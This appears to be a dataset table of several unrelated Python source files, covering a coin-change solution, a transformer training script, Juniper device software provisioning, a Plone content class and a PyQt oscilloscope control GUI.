index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
2,900 | 67a76f1f1dad4b7e73359f04ca8f599c8d32dc92 | #encoding:UTF-8
from numpy import *
#----------------------------------------------------------------------
def differences(a, b):
""""""
c = a[a!=b]
d = b[a!=b]
nums = nonzero(a!=b)[0]
return concatenate((mat(nums), c, d)).T |
2,901 | d5cb875dc31ca3dd7b165206415c346a076dd6e4 | import db
data = {'python book': ['10.09.2019', 200, 50, False]}
def test_insert_and_get_db(data):
db.insert(data)
result = db.get_db()
return result == data
if __name__ == '__main__':
print(f' Test insert dict in to db, and get dict from db is {test_insert_and_get_db(data)}')
print(f'List books = {db.list_book()}')
|
2,902 | 332c530d221c9441d6ff3646f8e9226dc78067f9 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
You are given coins of different denominations and a total amount of money. Write a function to compute the number of combinations that make up that amount. You may assume that you have infinite number of each kind of coin.
Example 1:
Input: amount = 5, coins = [1, 2, 5]
Output: 4
Explanation: there are four ways to make up the amount:
5=5
5=2+2+1
5=2+1+1+1
5=1+1+1+1+1
Example 2:
Input: amount = 3, coins = [2]
Output: 0
Explanation: the amount of 3 cannot be made up just with coins of 2.
Example 3:
Input: amount = 10, coins = [10]
Output: 1
Note:
You can assume that
1. 0 <= amount <= 5000
2. 1 <= coin <= 5000
3. the number of coins is less than 500
4. the answer is guaranteed to fit into signed 32-bit integer
"""
import sys
from functools import lru_cache
from typing import List
import pytest
class Solution:
def change(self, amount: int, coins: List[int]) -> int:
coins = sorted(coins, reverse=True)
@lru_cache(None)
def rec(i, amount):
if i == len(coins):
return 1 if amount == 0 else 0
return sum(rec(i+1, amount-c) for c in range(0, amount+1, coins[i]))
return rec(0, amount)
@pytest.mark.parametrize('amount, coins, expected', [
(5, [1,2,5], 4),
(3, [2], 0),
(10, [10], 1),
])
def test(amount, coins, expected):
assert expected == Solution().change(amount, coins)
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
2,903 | 7613dde4f49044fbca13acad2dd75587ef68f477 | import time
import argparse
import utils
from data_loader import DataLoader
from generate_model_predictions import sacrebleu_metric, compute_bleu
import tensorflow as tf
import os
import json
from transformer import create_masks
# Since the target sequences are padded, it is important
# to apply a padding mask when calculating the loss.
def loss_function(real, pred, loss_object, pad_token_id):
"""Calculates total loss containing cross entropy with padding ignored.
Args:
real: Tensor of size [batch_size, length_logits, vocab_size]
pred: Tensor of size [batch_size, length_labels]
loss_object: Cross entropy loss
pad_token_id: Pad token id to ignore
Returns:
A scalar float tensor for loss.
"""
mask = tf.math.logical_not(tf.math.equal(real, pad_token_id))
loss_ = loss_object(real, pred)
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
return tf.reduce_sum(loss_) / tf.reduce_sum(mask)
def train_step(model, loss_object, optimizer, inp, tar,
train_loss, train_accuracy, pad_token_id):
tar_inp = tar[:, :-1]
tar_real = tar[:, 1:]
enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)
with tf.GradientTape() as tape:
# training=True is only needed if there are layers with different
# behavior during training versus inference (e.g. Dropout).
predictions, _ = model(inp, tar_inp,
True,
enc_padding_mask,
combined_mask,
dec_padding_mask)
loss = loss_function(tar_real, predictions, loss_object, pad_token_id)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(tar_real, predictions)
def val_step(model, loss_object, inp, tar,
val_loss, val_accuracy, pad_token_id):
tar_inp = tar[:, :-1]
tar_real = tar[:, 1:]
enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)
predictions, _ = model(inp, tar_inp,
False,
enc_padding_mask,
combined_mask,
dec_padding_mask)
loss = loss_function(tar_real, predictions, loss_object, pad_token_id)
val_loss(loss)
val_accuracy(tar_real, predictions)
def compute_bleu_score(transformer_model, dataset, user_config, tokenizer_tar, epoch):
inp_language = user_config["inp_language"]
target_language = user_config["target_language"]
checkpoint_path = user_config["transformer_checkpoint_path"]
val_aligned_path_tar = user_config["val_data_path_{}".format(target_language)]
pred_file_path = "../log/log_{}_{}/".format(inp_language, target_language) + checkpoint_path.split('/')[
-1] + "_epoch-" + str(epoch) + "_prediction_{}.txt".format(target_language)
sacrebleu_metric(transformer_model, pred_file_path, None,
tokenizer_tar, dataset,
tokenizer_tar.MAX_LENGTH)
print("-----------------------------")
compute_bleu(pred_file_path, val_aligned_path_tar, print_all_scores=False)
print("-----------------------------")
# append checkpoint and score to file name for easy reference
new_path = "../log/log_{}_{}/".format(inp_language, target_language) + checkpoint_path.split('/')[
-1] + "_epoch-" + str(epoch) + "_prediction_{}".format(target_language) + ".txt"
# append score and checkpoint name to file_name
os.rename(pred_file_path, new_path)
print("Saved translated prediction at {}".format(new_path))
def do_training(user_config):
inp_language = user_config["inp_language"]
target_language = user_config["target_language"]
print("\n****Training model from {} to {}****\n".format(inp_language, target_language))
print("****Loading tokenizers****")
# load pre-trained tokenizer
tokenizer_inp, tokenizer_tar = utils.load_tokenizers(inp_language, target_language, user_config)
print("****Loading train dataset****")
# train data loader
train_aligned_path_inp = user_config["train_data_path_{}".format(inp_language)]
train_aligned_path_tar = user_config["train_data_path_{}".format(target_language)]
train_dataloader = DataLoader(user_config["transformer_batch_size"],
train_aligned_path_inp,
train_aligned_path_tar,
tokenizer_inp,
tokenizer_tar,
inp_language,
target_language,
True)
train_dataset = train_dataloader.get_data_loader()
print("****Loading val dataset****")
# val data loader
val_aligned_path_inp = user_config["val_data_path_{}".format(inp_language)]
val_aligned_path_tar = user_config["val_data_path_{}".format(target_language)]
val_dataloader = DataLoader(user_config["transformer_batch_size"] * 2, # for fast validation increase batch size
val_aligned_path_inp,
val_aligned_path_tar,
tokenizer_inp,
tokenizer_tar,
inp_language,
target_language,
False)
val_dataset = val_dataloader.get_data_loader()
# define loss and accuracy metrics
loss_object = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction='none')
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')
val_loss = tf.keras.metrics.Mean(name='val_loss')
val_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='val_accuracy')
print("****Loading transformer model****")
# load model and optimizer
transformer_model, optimizer, ckpt_manager = \
utils.load_transformer_model(user_config, tokenizer_inp, tokenizer_tar)
epochs = user_config["transformer_epochs"]
print("\nTraining model now...")
for epoch in range(epochs):
print()
start = time.time()
train_loss.reset_states()
train_accuracy.reset_states()
val_loss.reset_states()
val_accuracy.reset_states()
# inp -> english, tar -> french
for (batch, (inp, tar, _)) in enumerate(train_dataset):
train_step(transformer_model, loss_object, optimizer, inp, tar,
train_loss, train_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
if batch % 50 == 0:
print('Train: Epoch {} Batch {} Loss {:.4f} Accuracy {:.4f}'.format(
epoch + 1, batch, train_loss.result(), train_accuracy.result()))
if (batch + 1) % 2200 == 0:
# inp -> english, tar -> french
for (_, (inp, tar, _)) in enumerate(val_dataset):
val_step(transformer_model, loss_object, inp, tar,
val_loss, val_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
print('Batch {}: Val Loss: {:.4f}, Val Accuracy: {:.4f}\n'.format(batch, val_loss.result(),
val_accuracy.result()))
if user_config["compute_bleu"]:
print("\nComputing BLEU at batch {}: ".format(batch))
compute_bleu_score(transformer_model, val_dataset, user_config, tokenizer_tar, batch * epoch + 1)
print("After {} epochs".format(epoch + 1))
print('Train Loss: {:.4f}, Train Accuracy: {:.4f}'.format(train_loss.result(), train_accuracy.result()))
# inp -> english, tar -> french
for (batch, (inp, tar, _)) in enumerate(val_dataset):
val_step(transformer_model, loss_object, inp, tar,
val_loss, val_accuracy, pad_token_id=tokenizer_tar.pad_token_id)
print('Val Loss: {:.4f}, Val Accuracy: {:.4f}'.format(val_loss.result(), val_accuracy.result()))
print('Time taken for training epoch {}: {} secs'.format(epoch + 1, time.time() - start))
# evaluate and save model every x-epochs
ckpt_save_path = ckpt_manager.save()
print('Saving checkpoint after epoch {} at {}'.format(epoch + 1, ckpt_save_path))
if user_config["compute_bleu"]:
print("\nComputing BLEU at epoch {}: ".format(epoch + 1))
compute_bleu_score(transformer_model, val_dataset, user_config, tokenizer_tar, epoch + 1)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--config", help="Configuration file containing training parameters", type=str)
args = parser.parse_args()
user_config = utils.load_file(args.config)
seed = user_config["random_seed"]
utils.set_seed(seed)
print(json.dumps(user_config, indent=2))
do_training(user_config)
if __name__ == "__main__":
main()
|
2,904 | 45cdf33f509e7913f31d2c1d6bfada3a84478736 | # DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER
# Copyright (c) 2018 Juniper Networks, Inc.
# All rights reserved.
# Use is subject to license terms.
#
# Author: cklewar
import os
import threading
import time
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.utils.config import Config
from jnpr.junos.utils.sw import SW
from paramiko import BadHostKeyException, AuthenticationException
from scp import SCPClient
import lib.constants as c
from lib.logmsg import LogCommon
from lib.logmsg import LogSoftwareTask as logmsg
from lib.tasks.task import Task
from lib.tasks.tasktools import Software
from lib.tools import Tools
class SoftwareTask(Task):
CHECK_SCHEMA = True
TASK_TYPE = c.TASK_TYPE_PROVISION
TASK_VERSION = 1.0
sample_devices = dict()
sample_devices_lock = threading.Lock()
def __init__(self, sample_device=None, shared=None):
super(SoftwareTask, self).__init__(sample_device=sample_device, shared=shared)
self.logger.debug(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
LogCommon.IS_SUBCLASS.format(self.task_name,
issubclass(SoftwareTask, Task))))
def pre_run_task(self):
pass
def run_task(self):
"""
Provision device images
:param sample_device: A device object for which the image provisioning should be done
:return:
"""
target_version = getattr(self.grp_cfg.TASKS.Provision.Software.TargetVersion, self.sample_device.deviceModel,
None)
if self.sample_device.deviceStatus == c.DEVICE_STATUS_REBOOTED:
# Device has been rebooted do not update again
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALLED_VERS.format(self.sample_device.softwareVersion))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_TARGET_VERS.format(target_version))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
self.sample_device.deviceIsRebooted = False
self.update_task_state(new_task_state=c.TASK_STATE_DONE, task_state_message=c.TASK_STATE_MSG_DONE)
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_START_UPDATE.format(self.sample_device.deviceSerial))
SoftwareTask.sample_devices[self.sample_device.deviceSerial] = self.sample_device
if target_version is not None:
feedback = Software.compare_device_vers_with_target_vers(self.sample_device.softwareVersion,
target_version)
if feedback == 0:
self.update_task_state(new_task_state=c.TASK_STATE_DONE,
task_state_message=logmsg.SW_DONE_SAME_VERS)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALLED_VERS.format(
self.sample_device.softwareVersion))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_TARGET_VERS.format(target_version))
Tools.emit_log(task_name=self.task_name,
task_state={'taskState': self.task_state, 'taskStateMsg': logmsg.SW_DONE_SAME_VERS},
sample_device=self.sample_device, grp_cfg=self.grp_cfg, shared=self.shared,
scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
elif feedback == 1:
self.update_task_state(new_task_state=c.TASK_STATE_DONE,
task_state_message=logmsg.SW_DONE_DEV_NEWER_VERS)
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALLED_VERS.format(
self.sample_device.softwareVersion))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_TARGET_VERS.format(target_version))
Tools.emit_log(task_name=self.task_name,
task_state={'taskState': self.task_state,
'taskStateMsg': logmsg.SW_DONE_DEV_NEWER_VERS},
sample_device=self.sample_device, grp_cfg=self.grp_cfg, shared=self.shared,
scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
message=logmsg.SW_NO_UPDATE_NEEDED_NEWER)
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALLED_VERS.format(
self.sample_device.softwareVersion))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_TARGET_VERS.format(target_version))
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_UPDATE_NEEDED.format(
self.sample_device.softwareVersion, target_version))
filename = Software.get_software_image_name(self.sample_device, target_version,
grp_cfg=self.grp_cfg)
if filename:
full_path = self.grp_cfg.TASKS.Provision.Software.ImageDir + filename
if self.sample_device.deviceConnection.connected:
self.sample_device = self.install_device_software(full_path, filename, target_version)
if self.sample_device is not None:
if self.task_state != c.TASK_STATE_FAILED and self.task_state != c.TASK_STATE_REBOOTING:
if self.sample_device.deviceConnection is not None:
self.sample_device.deviceConnection.facts_refresh(keys='version')
self.sample_device.softwareVersion = self.sample_device.deviceConnection.facts[
"version"]
self.update_task_state(new_task_state=c.TASK_STATE_DONE,
task_state_message=c.TASK_STATE_MSG_DONE)
Tools.emit_log(task_name=self.task_name,
task_state={'taskState': self.task_state,
'taskStateMsg': c.TASK_STATE_MSG_DONE},
sample_device=self.sample_device, grp_cfg=self.grp_cfg,
shared=self.shared,
scope=c.LOGGER_SCOPE_ALL, level=c.LOGGER_LEVEL_INFO,
message=logmsg.SW_NO_UPDATE_NEEDED_SAME)
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=c.TASK_STATE_MSG_FAILED)
return
else:
return
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_CONN_NOK.format(
self.sample_device.deviceIP))
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CONN_NOK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_CONN_NOK.format(
self.sample_device.deviceIP))
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_IMG_NOK.format(target_version))
else:
self.logger.info(Tools.create_log_msg(self.task_name, self.sample_device.deviceSerial,
logmsg.SW_NO_TARGET_VERS_FOUND.format(
self.sample_device.deviceModel)))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_IMG_VALUE_NOK.format(
self.sample_device.deviceGroup))
def install_device_software(self, path, image, target_version):
"""
Call PyEz to install new JUNOS image to device
:param sample_device:
:param path:
:param image:
:param target_version
:return:
"""
package = os.path.join(os.getcwd(), path)
if c.SERVICEPLUGIN_OSSH in self.sample_device.deviceServicePlugin:
try:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CLEANUP_STORAGE)
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_CLEANUP_STORAGE)
self.sample_device.deviceConnection.rpc.request_system_storage_cleanup()
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_COPY_IMG.format(image))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_COPY_IMG.format(image))
# progress = SoftwareTask.copy_progress
with SCPClient(transport=self.sample_device.deviceConnection._conn._session.transport) as scp:
scp.put(package, remote_path=self.grp_cfg.TASKS.Provision.Software.RemoteDir)
except (BadHostKeyException, AuthenticationException) as e:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_COPY_IMG_NOK.format(e.message))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_COPY_IMG_NOK.format(e.message))
return self.sample_device
try:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_VERS.format(target_version))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_INSTALL_VERS.format(target_version))
result = self.sample_device.deviceConnection.sw.pkgadd(
self.grp_cfg.TASKS.Provision.Software.RemoteDir + image,
dev_timeout=self.grp_cfg.TASKS.Provision.Software.PkgAddDevTimeout)
except Exception as err:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_NOK.format(str(err)))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_INSTALL_NOK.format(str(err)))
return self.sample_device
if result is True:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_NOK.format(str(result)))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_INSTALL_NOK.format(str(result)))
time.sleep(3)
return self.sample_device
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
try:
rsp = self.sample_device.deviceConnection.sw.reboot()
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_REBOOT_DEV_RESP.format(rsp.replace('\n', " ")))
self.sample_device.deviceConnection.close()
self.sample_device.deviceIsRebooted = True
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message='Rebooting...')
c.oss_seen_devices_lck.acquire()
try:
if self.sample_device.deviceIP in c.oss_seen_devices:
c.oss_seen_devices.pop(self.sample_device.deviceIP, None)
finally:
c.oss_seen_devices_lck.release()
return self.sample_device
except exception.ConnectClosedError:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CONN_LOOSE_REBOOT)
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_CONN_LOOSE_REBOOT)
return self.sample_device
else:
try:
result = self.sample_device.deviceConnection.sw.install(package=package,
remote_path=self.grp_cfg.TASKS.Provision.Software.RemoteDir,
cleanfs=True, no_copy=False,
progress=SoftwareTask.install_progress)
except Exception as err:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_NOK.format(str(err)))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=str(err))
return self.sample_device
if result is True:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_INSTALL_OK.format(self.sample_device.deviceIP))
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_INSTALL_NOK.format(str(result)))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_INSTALL_NOK.format(str(result)))
time.sleep(3)
return self.sample_device
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_REBOOT.format(self.sample_device.deviceIP))
try:
rsp = self.sample_device.deviceConnection.sw.reboot()
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_REBOOT_DEV_RESP.format(rsp.replace('\n', " ")))
# self.sample_device.deviceConnection.close()
except exception.ConnectClosedError:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_CONN_LOOSE_REBOOT)
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_CONN_LOOSE_REBOOT)
finally:
alive = self.probe_device_not_alive(self.sample_device,
self.grp_cfg.TASKS.Provision.Software.RetryProbeCounter)
if not alive:
self.sample_device.deviceIsRebooted = True
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_PROBE_WAKEUP.format(self.sample_device.deviceIP))
status, self.sample_device = Tools.create_dev_conn(self.sample_device, connect=False)
if status:
alive = self.probe_device_alive(self.sample_device,
self.grp_cfg.TASKS.Provision.Software.RebootProbeTimeout)
if alive:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_PROBE_WAKUP_OK.format(self.sample_device.deviceIP))
self.sample_device.deviceIsRebooted = False
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_PROBE_WAKUP_OK.format(
self.sample_device.deviceIP))
status, self.sample_device = Tools.create_dev_conn(self.sample_device)
if status:
self.sample_device.deviceConnection.bind(cu=Config, sw=SW)
# Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
# message=logmsg.SW_CONN_OK.format(self.sample_device.deviceIP))
self.update_task_state(new_task_state=c.TASK_STATE_PROGRESS,
task_state_message=logmsg.SW_CONN_OK.format(
self.sample_device.deviceIP))
return self.sample_device
else:
return self.sample_device
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=c.TASK_STATE_MSG_FAILED)
self.sample_device.deviceConnection = None
return self.sample_device
else:
Tools.emit_log(task_name=self.task_name, sample_device=self.sample_device,
message=logmsg.SW_PROBE_DEV_NOK.format(self.sample_device.deviceIP,
self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter))
self.update_task_state(new_task_state=c.TASK_STATE_FAILED,
task_state_message=logmsg.SW_PROBE_DEV_NOK.format(
self.sample_device.deviceIP,
self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter))
def probe_device_alive(self, device, timeout):
"""
:param device:
:param timeout:
:return:
"""
alive = device.deviceConnection.probe(timeout=5)
probe_attemps = self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter
probe_cntr = 0
while not alive:
if probe_cntr <= probe_attemps:
alive = device.deviceConnection.probe(timeout)
probe_cntr += 1
Tools.emit_log(task_name=self.task_name, sample_device=device,
message=logmsg.SW_PROBE_DEV.format(timeout))
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_PROBE_WAIT_REBOOT.format(str(probe_cntr)))
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=c.TASK_STATE_FAILED)
break
return alive
def probe_device_not_alive(self, device, timeout):
"""
:param device:
:param timeout:
:return:
"""
alive = device.deviceConnection.probe(timeout=5)
probe_attemps = self.grp_cfg.TASKS.Provision.Software.RebootProbeCounter
probe_cntr = 0
while alive:
if probe_cntr <= probe_attemps:
alive = device.deviceConnection.probe(1)
probe_cntr += 1
Tools.emit_log(task_name=self.task_name, sample_device=device,
message=logmsg.SW_PROBE_DEV.format(timeout))
self.update_task_state(new_task_state=c.TASK_STATE_REBOOTING,
task_state_message=logmsg.SW_PROBE_WAIT_REBOOT.format(str(probe_cntr)))
time.sleep(timeout)
else:
self.update_task_state(new_task_state=c.TASK_STATE_FAILED, task_state_message=c.TASK_STATE_MSG_FAILED)
break
return alive
@staticmethod
def install_progress(dev, report):
c.logger.info(
'[{0:{1}}][{2:{3}}][{4}]'.format('SOFTWARE', c.FIRST_PAD, dev.facts["serialnumber"], c.SECOND_PAD, report))
with SoftwareTask.sample_devices_lock:
SoftwareTask.sample_devices[dev.facts['serialnumber']].deviceTasks.taskState['Software'] = {
'taskState': c.TASK_STATE_PROGRESS, 'taskStateMsg': report}
@staticmethod
def copy_progress(filename, size, sent):
# print filename + " " + str(int(size)) + " " + str(int(sent))
# print (sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024))
c.logger.info('PROVSW: Copy file <%s> progress <%s>', filename,
(sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024)))
#with SoftwareTask.sample_devices_lock:
# SoftwareTask.sample_devices[dev.facts['serialnumber']].deviceTasks.taskState['Software'] = (sent / (1024 * 1024)) * 100.0 / (size / (1024 * 1024)))
def post_run_task(self):
with SoftwareTask.sample_devices_lock:
if self.sample_device.deviceSerial in SoftwareTask.sample_devices:
del SoftwareTask.sample_devices[self.sample_device.deviceSerial]
|
2,905 | 3d5d88edca5d746b830363cc9451bda94c1d7aa4 | # -*- coding: utf-8 -*-
from plone import api
from plone.dexterity.content import Container
from sc.microsite.interfaces import IMicrosite
from zope.interface import implementer
@implementer(IMicrosite)
class Microsite(Container):
"""A microsite."""
def getLocallyAllowedTypes(self):
"""
By now we allow all allowed types without constrain.
TODO: fully implement ISelectableConstrainTypes
"""
portal_types = api.portal.get_tool('portal_types')
my_type = portal_types.getTypeInfo(self)
result = portal_types.listTypeInfo()
return [t for t in result if my_type.allowType(t.getId()) and
t.isConstructionAllowed(self)]
def getImmediatelyAddableTypes(self, context=None):
"""
By now we allow all allowed types without constrain.
TODO: fully implement ISelectableConstrainTypes
"""
return self.getLocallyAllowedTypes()
|
2,906 | 33464f19c42d1a192792a73297f4d926df78ab71 | # -*- coding: utf-8 -*-
"""
Created on 11/03/2020
@author: stevenp@valvesoftware.com
"""
import sys
from PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar,
QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout)
from PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot
#append the relative location you want to import from
sys.path.append("../Instrument_Libraries")
from instrumentConfig import Instrument
#For some reason the following code needs to be here for the Steam icon to show on the taskbar.
#Google code, don't know why.
import ctypes
myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
class MainWindow(QWidget):
instrumentName = "Unitialized Instrument"
instrumentList = []
#Instrument Types is a dictionary
instrumentTypes = {}
instrumentKey = "Uninitialized Key"
def __init__(self):
super(MainWindow, self).__init__()
self.configInstrument = Instrument()
self.instrumentList = self.configInstrument.listInstruments()
self.instrumentTypes = self.configInstrument.listInstrumentTypes()
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 500, 600)
self.setWindowTitle('Tektronix Channel Label Widget')
self.setWindowIcon(QIcon('Steam_icon_logo.gif'))
instrumentGroupBox = QGroupBox()
instrumentGrid = QGridLayout()
self.scopeComboBox = QComboBox()
for index in range (0, len(self.instrumentList)):
self.scopeComboBox.addItem(self.instrumentList[index].rstrip())
instrumentGrid.addWidget(self.scopeComboBox, 0, 0)
self.initScopeButton = QPushButton('Initialize Scope', self)
self.initScopeButton.clicked[bool].connect(self.initScope)
instrumentGrid.addWidget(self.initScopeButton, 1, 0)
scopeLabel = QLabel(self)
scopeLabel.setText("Scope Type")
instrumentGrid.addWidget(scopeLabel, 2, 0)
self.scopeIDN = QLabel(self)
self.scopeIDN.setText(self.instrumentName)
instrumentGrid.addWidget(self.scopeIDN, 3, 0)
instrumentGroupBox.setLayout(instrumentGrid)
instrumentGroupBox.setLayout(instrumentGrid)
startButtonGroupBox = QGroupBox()
startButtonLayout = QHBoxLayout()
self.startStopButton = QPushButton('Test Scope Connection', self)
self.startStopButton.clicked[bool].connect(self.startStopTest)
self.startStopButton.setEnabled(False)
startButtonLayout.addWidget(self.startStopButton)
self.getScopeShot = QPushButton('Get Scope Shot', self)
pictureGroupBox = QGroupBox()
pictureLayout = QHBoxLayout()
self.pictLabel = QLabel(self)
pictureLayout.addWidget(self.pictLabel)
pictureGroupBox.setLayout(pictureLayout)
self.getScopeShot.clicked[bool].connect(self.scopeShot)
self.getScopeShot.setEnabled(False)
startButtonLayout.addWidget(self.getScopeShot)
startButtonGroupBox.setLayout(startButtonLayout)
grid = QGridLayout()
grid.addWidget(instrumentGroupBox, 0, 0)
grid.addWidget(startButtonGroupBox, 1, 0)
grid.addWidget(pictureGroupBox, 2, 0)
self.setLayout(grid)
self.show()
def initScope(self):
self.instrumentName = self.scopeComboBox.currentText()
# self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName)
self.scope, self.scopeName = self.configInstrument.initInstrument("172.18.18.24")
print ("Configured Scope: " + self.scopeName)
self.scopeIDN.setText(self.scopeName)
self.startStopButton.setEnabled(True)
self.getScopeShot.setEnabled(True)
def startStopTest(self):
self.scope.setState(1, "ON")
self.scope.setState(2, "ON")
self.scope.setState(3, "ON")
self.scope.setState(4, "ON")
self.scope.setBandwidth(1, "ON")
self.scope.setBandwidth(2, "ON")
self.scope.setBandwidth(3, "ON")
self.scope.setBandwidth(4, "ON")
#Siglent library hard codes trigger level to mV
self.scope.setEdgeTrigger(3, 50, "FALL")
def scopeShot(self):
print ("Get Scope Shot")
self.scope.clear()
print ("ReadIDN Returns: " + str(self.scope.readIDN()))
print ("next line")
self.scope.clear()
